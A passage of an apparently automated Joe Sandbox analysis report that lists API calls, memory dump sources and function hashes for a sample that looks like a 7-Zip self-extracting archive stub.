  • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
• memcpy.MSVCRT(-00000001,00404AC6,?,?,?,?,?,00404AC6,?), ref: 0040342F
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 0040346C
• ??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,00404AC6,00404AC6,?,?,?,?,00404AC6,?), ref: 004034B2
Memory Dump Source
• Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
Similarity
• API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
• String ID:
• API String ID: 846840743-0
• Opcode ID: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
• Instruction ID: c1b9adc2f16cc45d244a7c0b75b8b4a4f89234fa72cd4c12ee41ca3d86f3c48f
• Opcode Fuzzy Hash: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
• Instruction Fuzzy Hash: 8F41C836904611AADB216F998881ABF7F6CEF40716F80403BED01B61D5DB3C9B4282DD

Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 00401F47: GetUserDefaultUILanguage.KERNEL32(00404416,00000000,00000020,?), ref: 00401F51
                                                                                              • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                                                              • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
                                                                                              • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                                                              • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
                                                                                              • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                                                                              • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                                                              • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
                                                                                              • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                                                              • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                                                              • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
                                                                                              • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                                                              • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                                                              • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                                                              • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
                                                                                              • Part of subcall function 00401F9D: _wtol.MSVCRT ref: 0040212A
                                                                                              • Part of subcall function 00401F9D: MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
                                                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,00000000,00000020,?), ref: 0040448C
                                                                                            • wsprintfW.USER32 ref: 004044A7
                                                                                              • Part of subcall function 00402F6C: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
                                                                                            • #17.COMCTL32(?,?,?,?,00000000,00000020,?), ref: 00404533
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                                                                            • String ID: 7zSfxFolder%02d$IA
                                                                                            • API String ID: 3387708999-1317665167
                                                                                            • Opcode ID: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
                                                                                            • Instruction ID: c443879f351b6d6d2b07c84fde6f3777072453d7374e8d7fc75fcfd2f507d9dd
                                                                                            • Opcode Fuzzy Hash: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
                                                                                            • Instruction Fuzzy Hash: E03140B19042199BDB10FFA2DC86AEE7B78EB44308F40407FF619B21E1EB785644DB58

                                                                                             Control-flow Graph (legend: Executed / Not Executed)
                                                                                            APIs
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000018,?,?,00000000,?), ref: 00408F0F
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000028,00000000,?,?,00000000,?), ref: 00408F59
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@
                                                                                            • String ID: IA$IA
                                                                                            • API String ID: 1033339047-1400641299
                                                                                            • Opcode ID: 6a22e71803ea0f4d69e2f58a84b042c4ce0c016d1f42beed39b79896576e25f5
                                                                                            • Instruction ID: ddcf9de22f7a46eeefc4975c1fab543939f34ce9f972055b0c78c556d294e1f5
                                                                                            • Opcode Fuzzy Hash: 6a22e71803ea0f4d69e2f58a84b042c4ce0c016d1f42beed39b79896576e25f5
                                                                                            • Instruction Fuzzy Hash: EF123671A00209DFCB14EFA5C98489ABBB5FF48304B10456EF95AA7392DB39ED85CF44

                                                                                             Control-flow Graph (legend: Executed / Not Executed)
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: free
                                                                                            • String ID: $KA$4KA$HKA$\KA
                                                                                            • API String ID: 1294909896-3316857779
                                                                                            • Opcode ID: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
                                                                                            • Instruction ID: 889df95fe732b3a4b2d84b4ab476e7a54c7f97cead7299b76f73e2708a1c6c0a
                                                                                            • Opcode Fuzzy Hash: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
                                                                                            • Instruction Fuzzy Hash: C5F09271409B109FC7319F55E405AC6B7F4AE447183058A2EA89A5BA11D3B8F989CB9C

                                                                                             Control-flow Graph (legend: Executed / Not Executed)
                                                                                            APIs
                                                                                            • _EH_prolog.MSVCRT ref: 004096D0
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040986E
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000038,?,00000000,00000000,00000001), ref: 00409941
                                                                                              • Part of subcall function 00409C13: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,00409952,?,00000000,00000000,00000001), ref: 00409C3B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@$H_prolog
                                                                                            • String ID: HIA
                                                                                            • API String ID: 3431946709-2712174624
                                                                                            • Opcode ID: 3a91edc2a80342029bdf13785710b8021a7be55c7c109f54d8d38dfd795fbdbc
                                                                                            • Instruction ID: da3614a8b55b1d80bdf53177d95d0cff5abf3d9c279f99a440b99522f39c568d
                                                                                            • Opcode Fuzzy Hash: 3a91edc2a80342029bdf13785710b8021a7be55c7c109f54d8d38dfd795fbdbc
                                                                                            • Instruction Fuzzy Hash: 53F13971610249DFCB24DF69C884AAA77F4BF48314F24416AF829AB392DB39ED41CF54

                                                                                             Control-flow Graph (legend: Executed / Not Executed)
                                                                                            APIs
                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
                                                                                            • memcmp.MSVCRT(?,?,?), ref: 004028E4
                                                                                            • memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
                                                                                            • memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlenmemcmp$memmove
                                                                                            • String ID:
                                                                                            • API String ID: 3251180759-0
                                                                                            • Opcode ID: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
                                                                                            • Instruction ID: d4955105e7b234ce255a009ef61331e6eb412850de833d0a73495bfba1f32545
                                                                                            • Opcode Fuzzy Hash: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
                                                                                            • Instruction Fuzzy Hash: 4A417F72E00209AFCF01DFA4C9889EEBBB5EF08344F04447AE945B3291D3B49E55CB55

                                                                                             Control-flow Graph (legend: Executed / Not Executed)
                                                                                            APIs
                                                                                            • CreateThread.KERNELBASE(00000000,00000000,0040129C,00000000,00000000,?), ref: 0040154F
                                                                                            • WaitForSingleObject.KERNEL32(000000FF,?,00404AFB,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401570
                                                                                              • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                                                              • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                                                              • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                                                              • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                                                              • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                                                              • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                                                              • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                                                              • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                                                              • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                                                              • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                                                              • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
                                                                                            • String ID:
                                                                                            • API String ID: 359084233-0
                                                                                            • Opcode ID: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
                                                                                            • Instruction ID: 87277f5b9ffc23463226fd0df2644328d4cfb3d5af9d6e9341eee715f5e270ad
                                                                                            • Opcode Fuzzy Hash: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
                                                                                            • Instruction Fuzzy Hash: 8231F171644200BBDA305B15DC86EBB37B9EBC5350F24843BF522F92F0CA79A941DA5E

                                                                                             Control-flow Graph: basic blocks 401986-4019cb; API calls CreateDirectoryW, GetLastError, SetLastError, GetFileAttributesW (graph rendering not recoverable from the page)
                                                                                            APIs
                                                                                            • CreateDirectoryW.KERNELBASE(004033CE,00000000,-00000001,004033CE,?,00404AC6,?,?,?,?,00404AC6,?), ref: 0040198D
                                                                                            • GetLastError.KERNEL32(?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401997
                                                                                            • SetLastError.KERNEL32(000000B7,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019A7
                                                                                            • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019B5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$AttributesCreateDirectoryFile
                                                                                            • String ID:
                                                                                            • API String ID: 635176117-0
                                                                                            • Opcode ID: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
                                                                                            • Instruction ID: 5ae0be16486f509c6b40768ba71a6c1c2cea9be4331c5fc90c1b41dbeb0419e3
                                                                                            • Opcode Fuzzy Hash: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
                                                                                            • Instruction Fuzzy Hash: D5E09AB0518250AFDE142BB4BD187DB3AA5AF46362F508932F495E02F0C33888428A89

                                                                                             Control-flow Graph: basic blocks 404a44-404afd; API call ??2@YAPAXI@Z; internal calls to 408676, 40a9f8, 408726, 40dcfb, 40b2fc, 40a7de, 407776, 403354, 404292, 40150b (graph rendering not recoverable from the page)
                                                                                            APIs
                                                                                            • ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,?,ExecuteFile,00000015,?,00405D20,?,00417788,00417788), ref: 00404A5A
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000040,?,?,?,?,?,?,?,?,00000000,?), ref: 00404ADC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@
                                                                                            • String ID: ExecuteFile
                                                                                            • API String ID: 1033339047-323923146
                                                                                            • Opcode ID: 612dc6f8e3fe8df0745ed42aa02adea807ab2e0a0b71f5bf8dc2b3d1454147a6
                                                                                            • Instruction ID: 446d0bd8c70a379003bbf02419fa435b46014474c8a02eb0da5acec479ce97d7
                                                                                            • Opcode Fuzzy Hash: 612dc6f8e3fe8df0745ed42aa02adea807ab2e0a0b71f5bf8dc2b3d1454147a6
                                                                                            • Instruction Fuzzy Hash: EA1184B5340104BFD710AB659C85D6B73A8EF80355724443FF602B72D1DA789D418A6D

                                                                                             Control-flow Graph: basic blocks 40adc3-40ae0f; API calls ??2@YAPAXI@Z, memmove, ??3@YAXPAX@Z (graph rendering not recoverable from the page)
                                                                                            APIs
                                                                                            • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                                                            • memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@??3@memmove
                                                                                            • String ID:
                                                                                            • API String ID: 3828600508-0
                                                                                            • Opcode ID: 2c1e852e3357fe345785b0ad8426fcfe448c8ec3a37487201466d82e595bf6a2
                                                                                            • Instruction ID: a8ce0a3cb4653ecb547b1a3698f229d81d6147035ad3680bc60947505803a3f4
                                                                                            • Opcode Fuzzy Hash: 2c1e852e3357fe345785b0ad8426fcfe448c8ec3a37487201466d82e595bf6a2
                                                                                            • Instruction Fuzzy Hash: 74F089763047016FC3205B1ADC80857BBABDFC4715311883FE55E93A50D634F891965A
                                                                                            APIs
                                                                                            • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 0040247E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: GlobalMemoryStatus
                                                                                            • String ID: @
                                                                                            • API String ID: 1890195054-2766056989
                                                                                            • Opcode ID: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
                                                                                            • Instruction ID: 9ce3ff159218229c34eda893c3d8d64f83397f3f2cddac743d7c565554413103
                                                                                            • Opcode Fuzzy Hash: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
                                                                                            • Instruction Fuzzy Hash: AAF0AF30A042048ADF15AB719E8DA5A37A4BB00348F10853AF516F52D4D7BCE9048B5D
                                                                                            APIs
                                                                                              • Part of subcall function 0040AAAB: _CxxThrowException.MSVCRT(?,00414EF8), ref: 0040AAC5
                                                                                              • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                                                              • Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                                                              • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,004149F0,?,004149B0), ref: 0040CAF2
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,004149F0,?,004149B0), ref: 0040CC4A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@$??2@ExceptionThrowmemmove
                                                                                            • String ID:
                                                                                            • API String ID: 4269121280-0
                                                                                            • Opcode ID: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
                                                                                            • Instruction ID: 88480e7f7e551c391a26326ce122d220a9eefc885560dc6ed21150e7f5ba8ef6
                                                                                            • Opcode Fuzzy Hash: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
                                                                                            • Instruction Fuzzy Hash: 00712571A00209EFCB24DFA5C8D1AAEBBB1FF08314F10463AE545A3291D739A945CF99
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 1329742358-0
                                                                                            • Opcode ID: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
                                                                                            • Instruction ID: 956102545b91a7c0cba0a64d671320761176ea25dc816e9057e3d4af94f09eda
                                                                                            • Opcode Fuzzy Hash: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
                                                                                            • Instruction Fuzzy Hash: 0D411F32800204AFCB09DB65CD45EBE7B35EF50304B18883BF402B72E2D63E9E21965B
                                                                                            APIs
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
